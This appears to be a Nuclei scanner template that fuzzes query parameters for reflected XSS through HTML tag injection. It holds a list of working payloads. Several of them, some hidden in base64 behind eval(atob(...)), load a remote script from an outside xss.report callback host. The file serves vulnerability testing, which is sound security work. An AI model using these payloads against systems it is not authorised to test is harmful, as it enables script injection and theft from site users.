id: xss-fuzz-html-tag-injection

info:
  name: Reflected XSS Checks via HTML tag injections
  author: quas
  severity: medium
  description: Fuzzes all query parameters for various reflected XSS vulnerabilities via HTML tag injections.

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    payloads:
      xss_payloads:
        - "<xsg>al('xs')</xsg>"
        - "<xsg>al('xs')"
        - "<x<xsg>sg>al('xs')"
        - "\"><xsg x=\"y\" onscrollsend=\"alert(1)\">"
        - "'><xsg x='y' onscrollsend='alert(1)'>"
        - "</script><xsg x=\"y\" onscrollsend=\"alert(1)\">"
        - "</sc</script>ript><xs<xsg> x=\"y\" onscrollsend=\"alert(1)\">"
        - "\"><script src=//xss.report/c/vulnhound></script>"
        - "'><script src=//xss.report/c/vulnhound></script>"
        - "\"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Z1bG5ob3VuZCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsK%&#61;&#61; autofocus>"
        - "\"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3Z1bG5ob3VuZCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsK%&#61;&#61; onerror=eval(atob(this.id))>"
    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{url_encode(xss_payloads)}}"
          - "{{url_encode(url_encode(xss_payloads))}}"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "(?i)<xsg>al\\('xs'\\)</xsg>(?:<[^>]+>)*$"
          - "(?i)<xsg>al\\('xs'\\)(?:<[^>]+>)*$"
          - "(?i)<[^>]*xsg x=\"y\" onscrollsend=\"alert\\(1\\)\"[^>]*>"
          - "(?i)<[^>]*xsg x='y' onscrollsend='alert\\(1\\)'[^>]*>"
      - type: word
        part: header
        words:
          - "text/html"

